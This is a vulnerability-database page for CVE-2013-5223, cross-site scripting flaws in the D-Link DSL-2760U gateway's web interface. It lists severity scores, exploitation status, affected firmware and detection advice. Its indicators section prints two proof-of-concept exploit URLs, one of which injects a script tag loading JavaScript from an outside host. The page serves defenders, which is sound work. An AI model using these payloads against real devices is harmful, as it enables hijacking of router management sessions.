cbcvebase.
CVE-2013-5223
published 2013-11-19

CVE-2013-5223: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DSL-2760U Gateway (Rev. E1) allow remote authenticated users to inject arbitrary web script or…

PriorityP274medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
33.57%
98.2th percentile
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DSL-2760U Gateway (Rev. E1) allow remote authenticated users to inject arbitrary web script or HTML via the (1) ntpServer1 parameter to sntpcfg.cgi, username parameter to (2) ddnsmngr.cmd or (3) todmngr.tod, (4) TodUrlAdd parameter to urlfilter.cmd, (5) appName parameter to scprttrg.cmd, (6) fltName in an add action or (7) rmLst parameter in a remove action to scoutflt.cmd, (8) groupName parameter to portmapcfg.cmd, (9) snmpRoCommunity parameter to snmpconfig.cgi, (10) fltName parameter to scinflt.cmd, (11) PolicyName in an add action or (12) rmLst parameter in a remove action to prmngr.cmd, (13) ippName parameter to ippcfg.cmd, (14) smbNetBiosName or (15) smbDirName parameter to samba.cgi, or (16) wlSsid parameter to wlcfg.wl.

Affected

1 ranges
VendorProductVersion rangeFixed in
dlinkdsl-2760u_firmware< 1.121.12

Detection & IOCsextracted from sources · hover to see the quote

path/sntpcfg.cgi
path/ddnsmngr.cmd
path/todmngr.tod
path/urlfilter.cmd
path/scprttrg.cmd
path/scoutflt.cmd
path/portmapcfg.cmd
path/snmpconfig.cgi
path/scinflt.cmd
path/prmngr.cmd
path/ippcfg.cmd
path/samba.cgi
path/wlcfg.wl
url/todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840
url/todmngr.tod?action=set_url&TodUrlAdd=GameOver%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E&port_num=1234
  • Monitor HTTP GET requests to any of the vulnerable CGI/CMD endpoints (sntpcfg.cgi, ddnsmngr.cmd, todmngr.tod, urlfilter.cmd, scprttrg.cmd, scoutflt.cmd, portmapcfg.cmd, snmpconfig.cgi, scinflt.cmd, prmngr.cmd, ippcfg.cmd, samba.cgi, wlcfg.wl) containing URL-encoded script tags (e.g., %3Cscript%3E) in parameter values.
  • Detect exploit tool activity by alerting on the User-Agent string 'XLabs Security Exploit Browser/1.0' in HTTP request logs targeting D-Link gateway management interfaces.
  • Alert on GET requests to /todmngr.tod with action=add or action=set_url containing URL-encoded HTML/script payloads in the username or TodUrlAdd parameters, as used by the proof-of-concept exploits.
  • Flag outbound script loads from device management pages to external domains (e.g., xlabs.com.br/xssi.js), which indicate successful stored XSS exploitation via the TodUrlAdd parameter.
  • ·The vulnerability requires the attacker to be authenticated; unauthenticated exploitation is not possible per the CVE description.
  • ·The CVE specifically affects D-Link DSL-2760U Gateway Rev. E1; the exploit-db PoCs target the related DSL-500B Gen 2 model, so detection rules should account for both device variants on the network.

CVSS provenance

nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
vulncheck5.4MEDIUM
cisa5.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.